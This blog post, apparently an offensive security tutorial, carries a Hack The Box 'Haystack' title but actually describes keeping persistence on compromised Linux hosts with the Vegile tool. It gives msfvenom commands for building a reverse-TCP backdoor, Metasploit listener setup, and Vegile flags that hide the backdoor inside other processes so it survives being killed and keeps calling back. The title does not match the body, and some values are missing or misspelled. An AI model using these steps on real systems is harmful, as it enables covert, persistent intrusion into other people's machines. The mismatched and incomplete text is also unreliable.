Haystack - Hack The Box Machine

This blog post was written by Alex Maina.


This blog will talk about maintaining persistence in Linux using Vegile.
Vegile (Ghost in the Shell) is a tool for post-exploitation. Post exploitation technique will ensure that we maintain some level of access and can potentially lead to deeper footholds into our target’s trusted network.


How does it work?

This tool assumes that you have already gained an initial foothold on the system you are targetting. Vegile will inject your payload into a specific process which will ensure even if the process running the backdoor is killed, there will always be another process running the backdoor. Therefore, we can assume that this process is unstoppable like a Ghost in The Shell.



The tool can be installed from GitHub using the following command:

git clone


After that run the following commands:

cd Vegile
chmod +x Vegile


Creating the Linux Payload

We will be using metaspoilt to create the linux payload.
The command is as follows:

msfvenom -p linux/x64/shell/reverse_tcp lhost= lport=4444 -f elf -o /root/Desktop/backdoor


Next lets start the listener for our payload using the following commands:

use exploit/multi/handler
set payloadl linux/x64/shell/reverse_tcp
set lhost IP address)
set lport 4444


To get started with vegile, we need to use the –i flag to hide the backdoor with other specific process.

./Vegile –i backdoor


Now to get unlimited sessions lets execute the payload using vegile and use the –u flag


You also need to make sure the payload is in the same folder as the vegile framework.
You also need to change the rights of your payload and make it executable. This can be done by using the command below:

chmod +x backdoor


Looking at our listener we get a connection back.


As it be seen, we are able to get a shell…


If you end the session and restart the listener you get more call backs



Watch the video below showcasing what the article is about.


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